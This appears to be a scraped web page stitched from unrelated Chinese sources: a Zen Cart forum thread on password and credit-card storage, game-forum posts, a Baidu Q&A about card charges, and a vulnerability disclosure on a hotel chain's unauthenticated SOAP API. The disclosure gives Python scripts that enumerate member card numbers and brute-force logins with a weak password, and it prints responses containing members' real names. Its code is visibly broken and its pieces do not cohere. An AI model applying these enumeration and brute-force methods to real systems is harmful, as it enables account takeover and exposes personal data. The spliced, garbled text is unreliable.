Zen Cart的安装、设置、升级讨论和使用技巧交流
& 分页： 1 / 1
会员的密码,从哪里可以看到?订单的信用卡号在可以显示完整吗?客户授权的状态在哪里可以修改?
帖子: 38注册:
都不可以的。
帖子: 420注册:
会员密码是加密保存在数据库中。订单信用卡号码直接保存在数据库中不安全，所以建议在设置信用卡模块时，输入电子邮件地址，这样信用卡号码只有部分保存在数据库中，中间部分通过电子邮件发到店主邮箱。客户授权的状态在 商店设置－客户资料－客户批准模式 下设置。
Zen Cart - 让每个人拥有自己生意的梦想成真 | 恕不回复站内短信提问 | QQ: 3171061
帖子: 12240注册:
客户的密码放在数据库里面进行了双重的MD5加密，不可逆的，所以客户找回密码的时候，是一个新的密码，并不是客户先前设置的密码，所以这样一来，安全性是可想而知！密码，信用卡
是电子商务站点，最敏感的2个东西，如果从程序上处理不好，可想而知！
QQ:1 9 2 3 6 1 1 3 zencart定制深度修改等
帖子: 1371注册:
17:22地址: http://www. paypal跳转 zencart定制深度修改等
QQ 帐号: 1 9 2 3 6 1 1 3
显示帖子 : 全部帖子1天7天2周1个月3个月6个月1年
排序 作者发表时间文章标题 升序降序
& 分页： 1 / 1
正在浏览此版面的用户：没有注册用户 和 1 位游客查看: 241|回复: 1
最后登录QQ注册时间阅读权限70精华0帖子
大咕噜, 积分 2447, 距离下一级还需 53 积分
性别男幸福币0 经验2047 帖子
07:57 上传
07:57 上传
有人说有幸运星，我立马来1000QB弄黄盖，我TM为啥米不先看公告呢，上面图能看懂吗，小斑马，居然有人说幸运星时间都不对，策划能不能换蓝翔的
最后登录注册时间阅读权限100精华0帖子
幸福币0 经验5232 帖子
亲以后先把QB留起来等充值活动充值。
3月21日~4月20日，白羊座符号象征着新的开始
Powered by我在携程网用工行信用卡订机票为什么不用输入密码就把钱扣走了啊？_百度知道
我在携程网用工行信用卡订机票为什么不用输入密码就把钱扣走了啊？
这是为什么啊，但是在余额栏没看到到相应的消费记录我的网上银行的确有看到额度减少了机票的那个价钱，是成功的订了吗
提问者采纳
携程默认该款为持卡人授权交易，有效期。信用卡片不需要密码也可以扣款一般交易是次日入账，效验码和持卡人身份证之后在输入信用卡卡号
提问者评价
大家回答都挺好的,谢啦~
其他类似问题
部分做了退票处理，以免机位售空。5 已出票。3 暂缓出票，预订过程结束： http！祝您生活愉快：您的订单已提交，24小时内订单无变动可以继续提交订单，系统或预订员正在处理您的订单：携程已经收到您的付款，如没接到通知请检查您注册使用的E-mail信箱：携程已经为您出票://www，或是致电我们的客服.ctrip，将有专人为您服务。希望我的回复对您有帮助：因各种原因您的预订被取消
已回答29354
响应时间&5小时
按默认排序
其他3条回答
等你正式消费完后才会划款的,是必须要开通境外网上支付功能才可以因为你做得是&quot,信用卡在国外支付;当时没马上扣,2楼;预授权&quot,支付时开通一下,只是把这一部分冻结住了,而且是要你的拼音,卡号,有效期和CVV码才可以,支付完成后马上关闭就可以
信用卡是不用输入密码的，除了提供卡号，还要提供卡背面的3个数字，卡的有效日期，卡主身份证号码，就可以了，所以，信用卡的这些资料也不能泄露出去哦，如果在国外网购物，就更简单，3个数字都不用提供，身份证号码也不用，所以，信用卡一定要保管妥善.......
相应记录有时要过段显示，不同地方消费手续不同
订机票的相关知识
等待您来回答
下载知道APP
随时随地咨询
出门在外也不愁速8酒店某接口未授权访问(卡号+实名+密码爆破)
飞扬风发布了速8酒店某处泄漏大量用户资料及订单信息
厂商忽略，后乌云补分 rank 13(提交前反查信息发现)白帽子飞扬风从APP分析的角度，使用burp进行抓包改包，由于burp编码的原因汉字显示不正常，未引起厂商重视。时隔一年，我通过百度无意间搜索到速8酒店一接口：
.cn/mobileInterface/Super8Interface.asmx
通过对速8酒店各接口分析，发现SOAP接口未验证权限，也未设置内部访问，导致未授权访问泄露用户卡号，实名，获得卡号后可对密码进行爆破。说明及演示如下：
速8酒店的说明做的真的不错，文档全中文，说明详细。最底部：getCustInfo
根据会员卡号查询会员实体接口（按手机号/会员卡号验证登录密码，成功后返回会员卡号，会员姓名，会员类型，可享受会员价格）
打开看看：
意思只要会员卡号正确就能返回卡号，会员姓名
文档里还有示例真心不错，那就用get方法测试一下，简单写了个python脚本：
from BeautifulSoup import BeautifulSoup
# For processing HTML
import BeautifulSoup
# To get everything
from bs4 import BeautifulS
import requests
except ImportError:
raise SystemExit('\n[!] requests模块导入错误,请执行pip install requests安装!')
print '\n速八酒店会员卡验证\n'
for cardNo in xrange(1, 9):
payload = {'cardNo': a+cardNo}
s = requests.get('.cn/mobileInterface/Super8Interface.asmx/getCustInfo?cardNo',params=payload)
soup = BeautifulSoup(s.content)
soup.findAll(name='content')
print soup.content
卡号设置从开始，简单说明一下我没有速8的会员卡，百度得到这张图片
，测试的时候遍历了9999张，选这个开始是为了演示爆破（卡号+实名 为了演示只显示前2），程序运行结果:
速八酒店会员卡验证
&cardno&&/cardno&
&custname&马本惠&/custname&
&membertype&贵宾会员&/membertype&
&pricetypelist&
&string&VIP&/string&
&string&EVIP&/string&
&string&WEB&/string&
&/pricetypelist&
&/content&
&cardno&&/cardno&
&custname&陈跃林&/custname&
&membertype&贵宾会员&/membertype&
&pricetypelist&
&string&VIP&/string&
&string&EVIP&/string&
&string&WEB&/string&
&/pricetypelist&
&/content&
有了卡号，我们就可以去爆破密码，还是用脚本测试
.cn/mobileInterface/Super8Interface.asmx?op=CustLoginEx
接口说明：CustLoginEx
会员登录返回会员实体接口（按手机号/会员卡号验证登录密码，成功后返回会员卡号，会员姓名，会员类型，可享受会员价格）
脚本如下(假设密码为弱口令123456，只是简单写了一下，python也可以从文件读取密码，这里仅作演示)：
import requests
except ImportError:
raise SystemExit('\n[!] requests模块导入错误,请执行pip install requests安装!')
print '\n速八酒店会员用户登录验证\n'
for loginName in xrange(1, 9):
payload = {'loginName': a+loginName,'loginPwd': ';}
s = requests.get('.cn/mobileInterface/Super8Interface.asmx/CustLoginEx?loginName&loginPwd',params=payload)
print '\n正在测试:',a+loginName
print '\n' + s.content
测试结果如下（脚本过于简陋，只为说明问题，见谅）：
速八酒店会员用户登录验证
&?xml version=&1.0& encoding=&utf-8&?&
&MessagePacketOfCustome xmlns:xsi=&http://www.w3.org/2001/XMLSchema-instance& xmlns:xsd=&http://www.w3.org/2001/XMLSchema& xmlns=&.cn/&&
&IsError&false&/IsError&
&ResultCode&00&/ResultCode&
&Message /&
&cardNo&&/cardNo&
&custName&马本惠&/custName&
&membertype&贵宾会员&/membertype&
&pricetypelist&
&string&VIP&/string&
&string&EVIP&/string&
&string&WEB&/string&
&/pricetypelist&
&/Content&
&CurTime&T20:15:32.:00&/CurTime&
&/MessagePacketOfCustome&
&?xml version=&1.0& encoding=&utf-8&?&
&MessagePacketOfCustome xmlns:xsi=&http://www.w3.org/2001/XMLSchema-instance& xmlns:xsd=&http://www.w3.org/2001/XMLSchema& xmlns=&.cn/&&
&IsError&true&/IsError&
&ResultCode&22&/ResultCode&
&Message&ㄦ锋瀵涓姝ｇ&&/Message&
&CurTime&T20:15:32.:00&/CurTime&
&/MessagePacketOfCustome&
卡号显示 &IsError&false&/IsError& 正常 其余显示 &IsError&true&/IsError&
从返回结果看到 卡号 密码123456 正确
用这个卡号密码在网站上登陆一下
正确 身份证号，手机号也出来了 开房的情况就不做演示了
由于精力有限，如果能对卡号进行大范围遍历，理想状态下能得到全部会员卡号及实名，爆破时可以修改程序，利用遍历出的卡号+脚本读取的弱口令密码文件会有更大收获。
解决方案：
内部访问 鉴权 会员卡号不要全数字 最好别致点
您对本文章有什么意见或着疑问吗？请到您的关注和建议是我们前行的参考和动力&&
您的浏览器不支持嵌入式框架，或者当前配置为不显示嵌入式框架。